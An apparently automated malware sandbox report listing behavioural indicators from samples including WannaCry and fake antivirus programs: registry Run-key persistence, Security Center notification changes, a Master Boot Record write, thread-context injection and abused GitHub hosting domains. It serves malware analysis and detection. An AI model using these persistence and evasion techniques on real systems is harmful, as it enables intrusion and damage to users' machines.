| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{11D1E5E8-14E1-4B5B-AE1A-2678CB91E8E5}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{BF474111-9116-45C6-AF53-209E64F1BB53}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{DE03E614-112D-43E0-8E15-E7236CC32108}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{F415899A-1576-4C8B-BC9F-4854781F8A20}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{130CD414-6BFD-4F6C-9362-A2264B222E76}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{17BE78EE-B40A-4B9E-835F-38EC62F9D479}\LocalServer32\ = "\"C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe\"" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{03141A2A-5C3A-458E-ABEC-0812AD7FF497}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{9DAB0CA5-AE19-41AE-955C-41DD44C52697}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{278637DA-FDFB-45C7-8CD8-F2D8A9199AB0}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{580243BF-3CEE-4131-A599-C6FED66BEB1B}\LocalServer32 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{251AD013-20AD-4C3F-8FE2-F66A429B4819}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{D5599B6B-FA0C-45B5-8309-853B003EA412}\LocalServer32\ServerExecutable = "C:\\Program Files\\Malwarebytes\\Anti-Malware\\MBAMService.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
UPX packed file
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Windows security modification
| Description | Indicator | Process | Target |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FIREWALLDISABLENOTIFY = "0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ANTIVIRUSDISABLENOTIFY = "0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UPDATESDISABLENOTIFY = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\ANTIVIRUSDISABLENOTIFY = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | \??\c:\windows\antivirus-platinum.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | \??\c:\windows\antivirus-platinum.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\UPDATESDISABLENOTIFY = "0" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FIREWALLDISABLENOTIFY = "1" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (int) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | \??\c:\windows\antivirus-platinum.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Antivirus = "\"C:\\Program Files (x86)\\AnVi\\avt.exe\" -noscan" | C:\Users\Admin\Desktop\[email protected] | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\HCGF35 = "C:\\windows\\system32\\wezuc9.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ADWCLEANER = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ANTIVIRUS PRO 2017 = "C:\\Users\\Admin\\Desktop\\[email protected]" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SOFTPROZ = "C:\\Program Files (x86)\\HjuTygFcvX\\lpsprt.exe" | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\hijlbxdnsg426 = "\"C:\\Users\\Admin\\Downloads\\tasksche.exe\"" | C:\Windows\SysWOW64\reg.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" | C:\Users\Admin\AppData\Local\6AdwCleaner.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SoftProz = "C:\\Program Files (x86)\\HjuTygFcvX\\lpsprt.exe" | C:\Program Files (x86)\HjuTygFcvX\lpsprt.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\Security Central = "C:\\Program Files (x86)\\Security Central\\Security Central.exe" | C:\Program Files (x86)\Security Central\Security Central.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AdwCleaner = "\"C:\\Users\\Admin\\AppData\\Local\\6AdwCleaner.exe\" -auto" | C:\Users\Admin\AppData\Local\6AdwCleaner.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\AntiVirus Pro 2017 = "C:\\Users\\Admin\\Desktop\\[email protected]" | C:\Users\Admin\Desktop\[email protected] | N/A |
Checks installed software on the system
Enumerates connected drives
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | raw.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
| N/A | camo.githubusercontent.com | N/A | N/A |
Maps connected drives based on registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum | C:\Users\Admin\Desktop\[email protected] | N/A |
| Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 | C:\Users\Admin\Desktop\[email protected] | N/A |
Writes to the Master Boot Record (MBR)
| Description | Indicator | Process | Target |
| File opened for modification | \??\PhysicalDrive0 | C:\Users\Admin\Desktop\[email protected] | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\System32\DriverStore\FileRepository\netathr10x.inf_amd64_2691c4f95b80eb3b\netathr10x.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{d61a14bd-732f-184d-b54e-bf860510b79d}\SET1163.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F4D9C889B7AEBCF4E1A2DAABC5C3628A_77D782D611E65A2A81EA974847CB0C84 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\net8185.inf_amd64_7a30f5a9441cd55b\net8185.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netbc64.inf_amd64_b96cdf411c43c00c\netbc64.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\c_net.inf_amd64_32a9ad23c1ecc42d\c_net.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netg664.inf_amd64_84cd7b2798e0a666\netg664.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\bthpan.inf_amd64_b06c3bc32f7db374\bthpan.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_6E4F36431D86962EFD432400DF65AC90 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8890A77645B73478F5B1DED18ACBF795_C090A8C88B266C6FF99A97210E92B44D | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\usbnet.inf_amd64_9e6bb7a4b7338267\usbnet.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\net8192se64.inf_amd64_167684f9283b4eca\net8192se64.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\21EA03E12A6F9D076B6BC3318EA9363E_6EF0095DA824AE045AE9FC5B645DF095 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\EE44ECA143B76F2B9F2A5AA75B5D1EC6_5BFB72FAE1BB9D1928D1C5C92F52E8EA | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\net7500-x64-n650f.inf_amd64_cc87c915f33d1c27\net7500-x64-n650f.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\Temp\{d61a14bd-732f-184d-b54e-bf860510b79d}\SET1165.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FA0E447C3E79584EC91182C66BBD2DB7 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7D266D9E1E69FA1EEFB9699B009B34C8_0A9BFDD75B598C2110CBF610C078E6E6 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\303572DF538EDD8B1D606185F1D559B8 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\21EA03E12A6F9D076B6BC3318EA9363E_6EF0095DA824AE045AE9FC5B645DF095 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\2F23D0F5E4D72862517E1CB26A329742_59C6B5742244136A08A70F9396A5A57A | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\msux64w10.inf_amd64_5aa81644af5957b3\msux64w10.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netr7364.inf_amd64_310ee0bc0af86ba3\netr7364.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\1F356F4D07FE8C483E769E4586569404 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\wezuc9.exe | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\Temp\{d61a14bd-732f-184d-b54e-bf860510b79d}\mbtun.cat | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\System32\DriverStore\FileRepository\mbtun.inf_amd64_add82795013a7c3b\mbtun.inf | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5457A8CE4B2A7499F8299A013B6E1C7C_D734EC3DD00546F46D368325396086B0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3B6E683A7A45CC59BF035C9BA8C7AB9D | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netvchannel.inf_amd64_ba3e73aa330c95d6\netvchannel.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\bcmdhd64.inf_amd64_e0bae6831f60ea5f\bcmdhd64.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netrtwlane_13.inf_amd64_992f4f46e65f30d4\netrtwlane_13.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netwtw04.inf_amd64_c8f5ae6576289a2d\netwtw04.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\b57nd60a.inf_amd64_77a731ab08be20a5\b57nd60a.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\229169D96B9C20761B929D428962A0A2_FC65190A8D1232A1711F16F9F20C5149 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8DFDF057024880D7A081AFBF6D26B92F | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\07CEF2F654E3ED6050FFC9B6EB844250_0A36A03C09DCEEA388C024E3D20B14B7 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netl260a.inf_amd64_783312763f8749c7\netl260a.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\dc21x4vm.inf_amd64_3294fc34256dbb0e\dc21x4vm.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\3E3E9689537B6B136ECF210088069D55_C4502B2ED7ABD16FF1FA41F55DB2B363 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\System32\CatRoot2\dberr.txt | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\net44amd.inf_amd64_450d4b1e35cc8e0d\net44amd.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netrndis.inf_amd64_be4ba6237d385e2e\netrndis.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\net819xp.inf_amd64_ff7a5dd4f9b1ceba\net819xp.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netwbw02.inf_amd64_1c4077fa004e73b4\netwbw02.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netwew01.inf_amd64_153e01d761813df2\netwew01.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\mrvlpcie8897.inf_amd64_07fc330c5a5730ca\mrvlpcie8897.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\drvstore.tmp | C:\Windows\system32\DrvInst.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_56DB209C155B5A05FCBF555DF7E6D1BB | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\ipoib6x.inf_amd64_ef71073a5867971f\ipoib6x.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netv1x64.inf_amd64_30040c3eb9d7ade4\netv1x64.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3E3E9689537B6B136ECF210088069D55_A925FAB5FFC3CEDB8E62B2DCCBBBB4F2 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\79841F8EF00FBA86D33CC5A47696F165 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8DFDF057024880D7A081AFBF6D26B92F | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netsstpa.inf_amd64_e76c5387d67e3fd6\netsstpa.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\athw8x.inf_amd64_55014eff4ceefbdf\athw8x.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netrtwlans.inf_amd64_97cd1a72c2a7829c\netrtwlans.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\07CEF2F654E3ED6050FFC9B6EB844250_0A36A03C09DCEEA388C024E3D20B14B7 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_466BAFE78D4077069B6C3828315C7C8D | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\2F23D0F5E4D72862517E1CB26A329742_59C6B5742244136A08A70F9396A5A57A | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\3E3E9689537B6B136ECF210088069D55_C4502B2ED7ABD16FF1FA41F55DB2B363 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5457A8CE4B2A7499F8299A013B6E1C7C_D734EC3DD00546F46D368325396086B0 | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Windows\System32\DriverStore\FileRepository\netvwwanmp.inf_amd64_f9e30429669d7fff\netvwwanmp.PNF | C:\Program Files\Malwarebytes\Anti-Malware\MBVpnTunnelService.exe | N/A |
Sets desktop wallpaper using registry
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\Downloads\@[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\1.gif" | C:\Users\Admin\Desktop\[email protected] | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-566096764-1992588923-1249862864-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\Desktop\\@[email protected]" | C:\Users\Admin\Downloads\WannaCry.EXE | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3360 set thread context of 6420 | N/A | C:\Users\Admin\Documents\[email protected] | C:\Users\Admin\Documents\[email protected] |
| PID 3036 set thread context of 6460 | N/A | C:\Program Files (x86)\Security Central\Security Central.exe | C:\Program Files (x86)\Security Central\Security Central.exe |
| PID 9112 set thread context of 9008 | N/A | C:\Program Files (x86)\Security Central\Security Central.exe | C:\Program Files (x86)\Security Central\Security Central.exe |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\api-ms-win-crt-string-l1-1-0.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.ServiceProcess.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Xml.Linq.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\Microsoft.WindowsDesktop.App.runtimeconfig.json | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\mbtun.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\ctlrvers.dat | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\MbamUI.Tray.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Formats.Asn1.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.IO.Compression.Brotli.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Reflection.Extensions.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Xml.XDocument.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.WindowsDesktop.App\6.0.25\cs\System.Windows.Forms.resources.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\System.Management.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\sdk\farflt.tmf | C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\api-ms-win-core-rtlsupport-l1-1-0.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
| File created | C:\Program Files\Malwarebytes\Anti-Malware\shared\Microsoft.NETCore.App\6.0.25\System.Private.Xml.dll | C:\Program Files\Malwarebytes\Anti-Malware\MBAMInstallerService.exe | N/A |
